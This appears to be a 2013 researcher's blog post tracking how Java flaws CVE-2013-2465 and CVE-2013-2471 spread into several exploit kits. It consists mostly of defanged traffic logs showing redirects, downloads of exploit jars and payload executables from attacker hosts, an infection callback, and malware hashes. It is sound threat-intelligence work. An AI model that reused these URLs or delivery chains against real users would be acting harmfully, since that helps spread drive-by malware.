 |
| Snipshots from Mitre |
Two days after disclosure, CVE-2013-2465 is starting to be integrated in Exploit Kits.
What makes it "better" than CVE-2013-2460 (recently integrated in Private Exploit Pack) is that it's targeting all Java branch 6 (update 45 included)
<edit4> NB: Have been told that it crashes with jre6 <= 18 </edit4>
Here is it in
Styx "Kein Edition" :
(this is Styx, but that instance was named Kein in the past)
 |
| CVE-2013-2465 successful pass in Styx "Kein Edition" |
GET http://www3.upziaixl5c0vi0.4pu .com/?26wu4g7=Vqbg2XGaXerZ3qaSmaicbomc6aZdZlzr6aCkbKbSr52am6vRZpVU
302 Moved Temporarily to http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ1M%2FMbqqZyNvW43a3hn6e1eSmn5Zpm5Di16Pfp66ZyeLYrpvEe3ixj9jc6NGboOPY3Nvcl%2BqZytyxtX6Lm6O1nKKXpZRqm6GhnJ%2BOpOvU2%2B7nrmqLqZzcpqKZnplf197foZuZk6ynoKun1mqXWKfrpqKcpZxulKKkl5aOlebgyOLirrDcqWam3uHj18ei29aox5bemqehm%2Bnpn5zUn1nr3uXZq8%2Bs2NPrztOOo9zZpOHo5amKZXSdm7eOoKysyNzqksnUmtre2ujmn5zUn1iqr%2BPO0s%2Brkdrb1Iubd%2Bzl056ntaHZpqOdnLKOoKxelbDU0M%2FJpOXY3qmkp2fXp1iqr%2BXN4YtrqdPhksnPmpymraqqlQ%3D%3D
GET http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ1M%2FMbqqZyNvW43a3hn6e1eSmn5Zpm5Di16Pfp66ZyeLYrpvEe3ixj9jc6NGboOPY3Nvcl%2BqZytyxtX6Lm6O1nKKXpZRqm6GhnJ%2BOpOvU2%2B7nrmqLqZzcpqKZnplf197foZuZk6ynoKun1mqXWKfrpqKcpZxulKKkl5aOlebgyOLirrDcqWam3uHj18ei29aox5bemqehm%2Bnpn5zUn1nr3uXZq8%2Bs2NPrztOOo9zZpOHo5amKZXSdm7eOoKysyNzqksnUmtre2ujmn5zUn1iqr%2BPO0s%2Brkdrb1Iubd%2Bzl056ntaHZpqOdnLKOoKxelbDU0M%2FJpOXY3qmkp2fXp1iqr%2BXN4YtrqdPhksnPmpymraqqlQ%3D%3D
200 OK (text/html)
GET http://www1.e23xiqinf9cjsdfh.4pu .com/zpdr.html
200 OK (text/html)
GET http://www1.e23xiqinf9cjsdfh .4pu.com/jvvn.html
200 OK (text/html)
GET http://www1.e23xiqinf9cjsdfh .4pu.com/BlUrdse.jar
200 OK (application/java-archive) a57c6b750f4ad08816086af89fe79fc6 File: Owncloud via goog.gl
 |
| Piece of CVE-2013-2465 in Styx "Kein" |
GET http://www2.d-93mv3zwkzkt.co7 .us/?qj7xbjj33e=lc2k3J%2FP4phZ2s2RdmSdpmOznd%2Fu17Gmm5mtlqOcZpiWllOtpqqnZrGtoKujpaSaXeTVp5tjY52KjpuV37OFzsKR6tTYrp1d64Y%3D&h=15
200 OK (application/octet-stream) 727aa2741cf1acfda34dd7d039950ea2 Simda
I will update this post as soon as I find it elsewhere.
<edit1 2013-08-16 18:00>
"When it rains, it pours" Timo Hirvonen about CVE-2013-2471 POC published on 2013-08-14.
 |
| Timo Hirvonen (F-Secure) Tweet about the CVE-2013-2471 Poc |
CVE-2013-2471 spotted in Kore Exploit Kit :
(aka Sibhost - Aka Urausy/BestAV EK)
Many thanks to Timo Hirvonen and Chris Wakelin for help.
 |
| CVE-2013-2471 Successful pass in Kore 2013-08-16 |
200 OK (text/html)
GET http://21sdtdzdrbzdrb8.3d-game .com:85/jquery.js
200 OK (application/javascript)
GET http://21sdtdzdrbzdrb8.3d-game .com:85/6N3M5P9z2L0KiXxnm5V9HonGcL7VP1.zip
200 OK (application/octet-stream) f32de44a0886a75af7aa5285a66707de File : http://goo.gl/UQ7mhq
 |
| CVE-2013-2471 in Kore |
GET http://21sdtdzdrbzdrb8.3d-game .com/6N3M5P9z2L0KiXxnm5V9HonGcL7VP?id=1&text=620
200 OK (text/html) <-- Call back after successfull infection
Payload is Urausy.
</edit1>
<edit2 2013-08-17>
CVE-2013-2465 spotted in
<edit3>This is NOT Redkit. Sorry about that. Thanks @xio_security.</edit3>
 |
| CVE-2013-2465 successfull pass in |
200 OK (text/html)
GET http://heimstaette-baerau .ch/blog/zps.fe54
200 OK (text/html)
GET http://heimstaette-baerau .ch/blog/rebza.tmp
200 OK (application/java-archive) 0996091c7bca0375cef3fb85bbc39af4 File here(Owncloud via goo.gl)
 |
| Piece of CVE-2013-2465 in |
GET http://heimstaette-baerau .ch/download.asp?p=1
200 OK (application/octet-stream) Karagny (??) - Decoded : ea40fee41c877f33b48125dbe92151bf
Sakura : CVE-2013-2471 :
Thanks to Chris Wakelin for providing a referer.
 |
| CVE-2013-2465 sucessfull pass in Sakura 2013-08-17 |
200 OK (text/html)
 |
 |
| CVE-2013-2471 in Sakura 2013-08-17 |
200 OK (application/octet-stream) Zaccess. Decoded : 64fca5d4cc118384a1dd4d12d1028914
</edit2>
<edit4 2013-08-18>
Neutrino : CVE-2013-2465 :
In Neutrino now : (not 2471 as previously written. Thanks Chris Wakelin).
 |
| CVE-2013-2465 successful pass in Neutrino 2013-08-18 =) |
200 OK (text/html)
GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)
GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/index.js
200 OK (application/x-javascript)
POST http://bcmgmychnitfsyrfhysjj.podzone .org:8000/nbmucsyxv
200 OK (text/html)
GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/exrybkyrvdjes?yegpmkpd=noksqa
200 OK (application/java-archive) 46e2cc42dba10e6de72fbdacc5bf1b9d File Here (Owncloud via goo.gl)
 |
| Piece of CVE-2013-2465 in Neutrino jar 2013-08-18 |
GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/zdalnfookkkic?yjnhbik=noksqa
200 OK (application/octet-stream) Payload once decoded was : 5d6d892cdc7d580839d0947fa983775c
</edit4>
<edit6 2013-08-20>
Blackhole Exploit Kit : CVE-2013-2465
 |
| CVE-2013-2465 positive pass in Blackhole Exploit Kit 2013-08-20 |
Note : this is a Blackhole in "EKaas" using API ( domain and path are fast rotating).
GET http://mlbrsd.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php
200 OK (text/html)
GET http://mlbrsd.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php?gktBn=atztcBRX&yBeNSyNyLEgI=rIiTF
200 OK (application/java-archive) 6cf6091c11a9fdf2fe23afcfd39010e8 File here
 |
| Piece of CVE-2013-2465 code in BH EK & Cool EK 2013-08-20 |
GET http://isuvnw.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php?sf=52322h2f32&be=532f553155532j552g32&y=2d&eZ=V&RR=L
200 OK (application/x-msdownload) Payload once Decoded : fc4fb9bedb0c3f57d4eb824308ea15ab
Cool EK : CVE-2013-2465 (exact same file as Blackhole)
GET http://degnera.realdealdemocracy .com:801/hard_piece-core_sulphur.php
200 OK (text/html)
GET http://degnera.realdealdemocracy .com:801/send_civic.html
200 OK (text/html)
GET http://degnera.realdealdemocracy .com:801/quietly-sort-withdrawal_unity.html
200 OK (text/html)
GET http://degnera.realdealdemocracy .com:801/tame_knight-courage.html
200 OK (text/html)
GET http://degnera.realdealdemocracy .com:801/determine-syntactic_winner.html
200 OK (text/html)
GET http://degnera.realdealdemocracy .com:801/diagnosis_hemisphere_energy.jar
200 OK (application/java-archive) 6cf6091c11a9fdf2fe23afcfd39010e8 File here
|
| Piece of CVE-2013-2465 code in BH EK & Cool EK 2013-08-20 |
200 OK (application/x-msdownload) c973b3c58ec3bb04a43e649722e1e2f1 (didn't check but it should be Reveton/Live Security Professionnal)
</edit6>